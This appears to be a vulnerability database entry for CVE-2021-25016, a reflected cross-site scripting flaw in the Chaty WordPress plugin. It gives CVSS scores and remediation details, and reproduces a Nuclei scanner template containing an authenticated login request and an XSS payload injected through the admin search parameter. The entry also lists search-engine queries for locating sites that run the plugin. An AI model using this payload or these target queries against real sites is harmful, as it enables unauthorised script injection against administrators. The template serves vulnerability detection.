Lucene search

ProjectDiscoveryNUCLEI:CVE-2021-25016

HistoryOct 16, 2023 - 6:37 p.m.

Chaty < 2.8.2 - Cross-Site Scripting

2023-10-1618:37:06

ProjectDiscovery

github.com

cve2021

wpscan

wordpress

wp-plugin

xss

authenticated

chaty

premio

cvss

cwe-79

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

46.7%

JSON

The Chaty WordPress plugin before 2.8.3 and Chaty Pro WordPress plugin before 2.8.2 do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting.

id: CVE-2021-25016

info:
  name: Chaty < 2.8.2 - Cross-Site Scripting
  author: luisfelipe146
  severity: medium
  description: |
    The Chaty WordPress plugin before 2.8.3 and Chaty Pro WordPress plugin before 2.8.2 do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting.
  remediation: Fixed in 2.8.3
  reference:
    - https://wpscan.com/vulnerability/b5035987-6227-4fc6-bc45-1e8016e5c4c0
    - https://nvd.nist.gov/vuln/detail/CVE-2021-25016
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25016
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-25016
    cwe-id: CWE-79
    epss-score: 0.00106
    epss-percentile: 0.43227
    cpe: cpe:2.3:a:premio:chaty:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: premio
    product: chaty
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/chaty/
    fofa-query: body=/wp-content/plugins/chaty/
    publicwww-query: "/wp-content/plugins/chaty/"
  tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,authenticated,chaty,premio

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "search=</script><img src onerror=alert(document.domain)>"
          - "chaty_page_chaty"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c82f86dcd3e8b4a15e3ddea6f2679ac006399a334f94d29004e7c499a456647c02207d7a1d690acd371e2575c5a5890894ee0a0e3ca1c7507d8e83c613349a67ec41:922c64590222798bb761d5b6d8e72950